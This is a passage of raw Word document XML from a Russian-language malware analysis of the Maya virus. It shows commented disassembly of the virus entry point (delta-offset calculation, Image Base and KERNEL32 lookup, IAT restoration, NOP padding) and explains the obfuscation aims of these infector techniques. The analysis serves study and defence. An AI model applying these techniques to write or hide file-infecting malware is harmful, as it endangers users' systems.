        <w:t>CODE:00401033                 cmp     eax, 0FFFFFFFFh           ; Проверить, была ли функция найдена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660CB627" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401036                 jz      short loc_401097          ; Если нет - выйти из функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4E9A3" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401038                 nop                               ; NOP-слайды для обфускации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0773C22C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CODE:00401039                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EECCF0C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CODE:0040103A                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD000FC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CODE:0040103B                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2A6AE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 xml:space="preserve">CODE:0040103C                 mov     ss:GetModuleHandleA_0[ebp], eax ; </w:t>
      </w:r>
      <w:r>
        <w:t>Сохранить</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetModuleHandleA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981209A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CODE:00401042                 push    ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC810C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 xml:space="preserve">CODE:00401043                 mov     ebx, offset aKernel32Dll  ; </w:t>
      </w:r>
      <w:r>
        <w:t>Загрузить</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>строку</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "KERNEL32.dll"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F7FAE" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401048                 add     ebx, ebp                  ; Вычислить реальный адрес</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2751F348" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:0040104A                 push    ebx                       ; Передать в функцию как параметр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEEC60F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CODE:0040104B                 call    eax                       ; GetModuleHandleA("KERNEL32.dll")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30EA12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 xml:space="preserve">                                                               ; </w:t>
      </w:r>
      <w:r>
        <w:t>Получить</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>базовый</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9065FF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>CODE:0040104D                 pop     ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5969F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 xml:space="preserve">CODE:0040104E                 mov     ss:kernel32_ImageBase[ebp], eax ; </w:t>
      </w:r>
      <w:r>
        <w:t>Сохранить</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>базовый</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>адрес</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249000F8" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CODE:00401054                 mov     edi, offset dword_401BE6  ; </w:t>
      </w:r>
      <w:r>
        <w:t>Начать</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>цикл</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>восстановления</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312738C" w14:textId="4381EE34" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401059                 add     edi, ebp                  ; Вычислить реальный адрес начала списка функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23448FC1" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r>
        <w:t>ДЕТАЛЬНЫЙ АНАЛИЗ КОДА:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B5147" w14:textId="315BDF07" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r>
        <w:t>Код точки входа вируса Maya не содержит признаков упаковщика. Вместо этого он сразу начинает выполнение основной логики вируса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7535C" w14:textId="67902031" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r>
        <w:t>1. Вычисление delta offset: Первые несколько инструкций вычисляют реальный адрес загрузки вируса. Это необходимо потому, что вирус может быть загружен по разным адресам в памяти (особенно при заражении других файлов). Delta offset техника позволяет вирусу работать независимо от адреса загрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF41ED" w14:textId="136F5A04" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r>
        <w:t>2. Отсутствие распаковки: В коде нет циклов распаковки, выделения памяти, чтения файлов или расшифровки данных. Код сразу переходит к восстановлению IAT  выполнению основной функциональности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025E223D" w14:textId="6EA4A329" w:rsidR="008A5999" w:rsidRPr="00DD2537" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Прямой доступ к коду: Все инструкции в точке входа имеют осмысленный смысл с точки зрения функциональности вируса, а не распаковки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F548E" w14:textId="7448F56B" w:rsidR="00664189" w:rsidRDefault="00485DB5" w:rsidP="00664189">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc215414028"/>
      <w:r>
        <w:t>Обфускация кода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE6A088" w14:textId="5B2B74D4" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r w:rsidRPr="00485DB5">
        <w:t>Хотя вирус не использует упаковщик, он применяет несколько техник обфускации для</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:t>усложнения статического анализа и затруднения создания антивирусных сигнатур. Эти</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:t>техники были характерны для вирусов конца 1990-х годов, когда создатели вредоносного</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:t>ПО стремились обойти простые системы обнаружения, основанные на сигнатурах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A1AD2" w14:textId="67C0B222" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r w:rsidRPr="00485DB5">
        <w:t>Обфускация (от английского "obfuscation" - затемнение, запутывание) - это процесс</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:t>намеренного усложнения кода с целью затруднить его понимание и анализ. В контексте</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:t>вредоносного программного обеспечения обфускация используется для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3F474" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r w:rsidRPr="00485DB5">
        <w:t>1. Усложнения статического анализа антивирусными системами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86043E" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r w:rsidRPr="00485DB5">
        <w:t>2. Затруднения создания сигнатур на основе байт-последовательностей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495DB356" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r w:rsidRPr="00485DB5">
        <w:t>3. Усложнения ручного анализа исследователями безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B389F68" w14:textId="667EBA4F" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:r w:rsidRPr="00485DB5">
        <w:t>4. Обхода эвристических детекторов, основанных на анализе структуры кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171CAF55" w14:textId="76E58211" w:rsidR="00664189" w:rsidRPr="007F3082" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:t>Вирус Maya использует несколько классических техник обфускации, которые детально</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:t>разобраны ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B3C79" w14:textId="6FFBEBF5" w:rsidR="00664189" w:rsidRDefault="00485DB5" w:rsidP="00664189">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc215414029"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вычисление базового адреса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="59259EB0" w14:textId="6858DA3D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Delta offset (дельта-смещение) - это техника, позволяющая коду вычислять свой реальный</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>адрес загрузки во время выполнения, независимо от того, по какому адресу он был</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>загружен. Эта техника критически важна для вирусов, которые заражают другие файлы,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>так как они могут быть загружены по разным адресам в памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345B1D6" w14:textId="7777777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КАК РАБОТАЕТ DELTA OFFSET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5D850" w14:textId="612AE62B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Когда Windows загружает PE-файл, он может быть размещен по разным адресам в зависимости</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>от различных факторов: наличия ASLR (Address Space Layout Randomization), конфликтов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>с другими модулями, и т.д. Базовый адрес загрузки (Image Base) может отличаться от</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ожидаемого адреса, указанного в PE-заголовке (обычно 0x00400000 для 32-битных файлов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64782AEF" w14:textId="7777777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Delta offset техника решает эту проблему следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711403AA" w14:textId="7777777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1. Код получает свой текущий адрес выполнения (EIP - Instruction Pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F911958" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>2. Вычисляет разницу между текущим адресом и ожидаемым адресом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7779DCDB" w14:textId="6120BA1F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lastRenderedPageBreak/>
        <w:t>3. Использует эту разницу (delta) для корректировки всех адресов переменных и функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31399BA9" w14:textId="7777777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ДЕТАЛЬНЫЙ РАЗБОР РЕАЛИЗАЦИИ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E48BA2" w14:textId="7777777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Адрес: 0x00401000 (начало функции start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C181CC" w14:textId="21CDAFA7" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Код из lst файла с подробными комментариями:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C06871B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CODE:00401000 start           proc near</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179E45C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CODE:00401000                 push    ebp                      ; ШАГ 1: Сохранить предыдущий базовый указатель стека</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A7730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Это стандартная практика для сохранения состояния</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB3724" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157F3D97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CODE:00401001                 call    $+5                      ; ШАГ 2: Вызов следующей инструкции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A97B5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Инструкция "call $+5" означает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4ACA08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$ - это текущий адрес (0x00401001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09354F21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+5 - это смещение к следующей инструкции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D295DA2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Результат: в стек помещается адрес 0x00401006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F9F5FB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Это классический трюк для получения EIP без использования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E67C4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специальных инструкций (в x86 нет прямой инструкции MOV EIP, EAX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF8BEA" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D677550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CODE:00401006 loc_401006:                                     ; ШАГ 3: Метка, указывающая на следующую инструкцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C47B7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CODE:00401006                 pop     ebp                      ; ШАГ 4: Извлечь адрес из стека в регистр EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53282686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После этой инструкции EBP = 0x00401006 (если код загружен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465AC3DD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по ожидаемому адресу)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2318BF51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EBP теперь содержит реальный адрес выполнения текущего кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07704B97" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A108611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CODE:00401007                 mov     ebx, ebp                  ; ШАГ 5: Сохранить текущий адрес в EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F42C70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EBX теперь содержит реальный адрес loc_401006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4059C50A" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE8F03E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 xml:space="preserve">CODE:00401009                 sub     ebp, offset loc_401006   ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ШАГ</w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вычислить</w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> delta offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59554BAB" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5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offset loc_401006 - это смещение метки от начала сегмента</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844D476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(в данном случае 0x00401006 - 0x00401000 = 6 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43977794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Если код загружен по ожидаемому адресу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D331E6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EBP = 0x00401006 - 0x00401006 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552E02D2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Если код загружен по другому адресу, например 0x00500000:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F09F4" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; EBP = 0x00501006 - 0x00401006 = 0x00100000 (delta offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649DC369" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; EBP теперь содержит delta offset, который будет использоваться</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E70F5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для вычисления реальных адресов всех переменных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29202A5E" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520616F0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CODE:0040100F loc_40100F:                                     ; ШАГ 7: Метка для вычисления Image Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAD745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CODE:0040100F                 mov     eax, 1000h               ; Загрузить значение 0x1000 (4096 в десятичной системе)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1142FE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Это размер виртуальной страницы памяти (4 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3043C458" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D0350B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CODE:00401014                 add     eax, 6                    ; Добавить 6 (смещение до loc_401006 от начала секции)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FAF00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EAX = 0x1000 + 6 = 0x1006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B398232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Это ожидаемое смещение функции start от Image Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284480EC" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67129F85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CODE:00401017                 sub     ebx, eax                  ; Вычесть ожидаемое смещение из реального адреса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E9D96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EBX = 0x00401006 - 0x1006 = 0x00400000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24706F64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Это вычисление реального Image Base программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E1863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Результат: EBX содержит реальный базовый адрес загрузки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AA4544" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592FF720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CODE:00401019                 mov     ss:ImageBase[ebp], ebx   ; ШАГ 8: Сохранить реальный Image Base в глобальной переменной</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20287406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ss:ImageBase[ebp] - это обращение к переменной ImageBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7DC27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с учетом delta offset в EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C59312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Эта переменная будет использоваться во всем коде вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02AC42" w14:textId="33A7D748" w:rsidR="00485DB5" w:rsidRP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для вычисления реальных адресов функций и переменных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD21B1F" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ПОЧЕМУ ЭТА ТЕХНИКА ВАЖНА:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2BCF2" w14:textId="7215B2D4" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1. Независимость от адреса загрузки: Вирус может работать, будучи загруженным по любому адресу в памяти. Это критично при заражении файлов, где вирусный код добавляется в конец секции и может быть загружен по неожиданному адресу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDBA19A" w14:textId="20302505" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>2. Обход ASLR: Хотя ASLR (Address Space Layout Randomization) не был широко распространен в 1998 году, delta offset техника делает код независимым от базового адреса, что актуально и для современных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33895B" w14:textId="66C61901" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>3. Упрощение работы с глобальными переменными: Все глобальные переменные в вирусе используют конструкцию вида `ss:variable_name[ebp]`, где EBP содержит delta offset. Это позволяет коду правильно обращаться к переменным независимо от адреса загрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544884D" w14:textId="1A2970BB" w:rsidR="00DD2537" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
